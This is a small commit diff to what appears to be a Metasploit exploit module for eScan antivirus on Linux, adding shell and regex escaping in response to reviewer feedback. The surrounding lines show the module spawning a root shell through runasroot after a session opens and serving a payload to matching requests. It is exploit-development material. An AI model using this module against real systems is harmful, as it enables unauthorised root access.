Add @firefart's feedback

Author: jvazquez-r7

modules/exploits/linux/antivirus/escan_password_exec.rb

@@ -90,7 +90,7 @@ def cmd_exec(session, cmd)
   # Escalating privileges here because runasroot only can't be executed by
   # mwconf uid (196).
   def on_new_session(session)
-    cmd_exec(session, "#{datastore['RUNASROOT']} /bin/sh")
+    cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
     super
   end
 
@@ -101,7 +101,7 @@ def primer
 
   def on_request_uri(cli, request)
     print_status("Request: #{request.uri}")
-    if request.uri =~ /#{get_resource}/
+    if request.uri =~ /#{Regexp.escape(get_resource)}/
       print_status("Sending payload...")
       send_response(cli, @pl)
     end